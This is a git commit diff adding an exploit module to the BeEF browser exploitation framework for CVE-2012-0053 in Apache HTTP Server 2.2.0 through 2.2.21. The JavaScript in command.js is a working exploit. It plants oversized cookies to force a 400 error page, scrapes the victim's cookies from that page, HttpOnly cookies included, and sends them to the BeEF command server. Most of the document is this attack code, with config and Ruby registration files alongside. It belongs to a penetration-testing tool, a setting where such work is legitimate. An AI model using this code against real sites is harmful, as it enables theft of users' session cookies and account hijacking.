Merge pull request #859 from gcattani/ApacheCookieDisclosure

Module: Apache HTTP Server cookie disclosure (exploit)
2013-03-19 11:22:59 -07:00
parent fb26ef5f71 6abb21ac53
commit 497c3eb3f3
4 changed files with 106 additions and 0 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -4,3 +4,5 @@ custom-config.yaml
 .DS_Store
 .gitignore
 .rvmrc
+
+*.lock
--- a/modules/exploits/apache_cookie_disclosure/command.js
+++ b/modules/exploits/apache_cookie_disclosure/command.js
@@ -0,0 +1,75 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// BASED ON https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
+
+beef.execute(function() {
+
+	function setCookies (good) {
+
+		var str = "";
+		
+		for (var i=0; i< 819; i++) {
+			str += "z";
+		}
+		
+		for (i = 0; i < 10; i++) {
+			
+			if (good) {		// Expire evil cookie
+				var cookie = "beef" + i + "=;expires=" + new Date(+new Date()-1).toUTCString() + "; path=/;";
+			} else {		// Set evil cookie
+				var cookie = "beef" + i + "=" + str + "; path=/";
+			}
+		document.cookie = cookie;
+		}
+	}
+
+	function makeRequest() {
+		setCookies();
+
+		function parseCookies () {
+			var cookie_dict = {};
+			
+			// React on 400 status
+			if (xhr.readyState === 4 && xhr.status === 400) {
+				
+				// Replace newlines and match <pre> content
+				var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
+				
+				if (content.length) {
+					
+					// Remove "Cookie:" prefix
+					content = content[1].replace("Cookie: ", "");
+					
+					var cookies = content.replace(/beef\d=z+;?/g, '').split(/;/g);
+					
+					// Add cookies to object
+					for (var i=0; i<cookies.length; i++) {
+						var s_c = cookies[i].split('=',2);
+						cookie_dict[s_c[0]] = s_c[1];
+					}
+				}
+				
+				// Unset malicious cookies
+				setCookies(true);
+	
+				var result = JSON.stringify(cookie_dict);
+	
+				beef.net.send("<%= @command_url %>", <%= @command_id %>, "cookies="+result);
+	
+			}
+		}
+		
+		// Make XHR request
+		var xhr = new XMLHttpRequest();
+		xhr.onreadystatechange = parseCookies;
+		xhr.open("GET", "/", true);
+		xhr.send(null);
+	}
+
+	makeRequest();
+
+});
--- a/modules/exploits/apache_cookie_disclosure/config.yaml
+++ b/modules/exploits/apache_cookie_disclosure/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        apache_cookies:
+            enable: true
+            category: "Exploits"
+            name: "Apache Cookie Disclosure"
+            description: "This module exploits CVE-2012-0053 in order to read the victim's cookies, even if issued with the HttpOnly attribute. The exploit only works if the target server is running Apache HTTP Server 2.2.0 through 2.2.21."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]
--- a/modules/exploits/apache_cookie_disclosure/module.rb
+++ b/modules/exploits/apache_cookie_disclosure/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Apache_cookies < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['apache_cookies'] = @datastore['apache_cookies']
+		save content
+	end
+
+end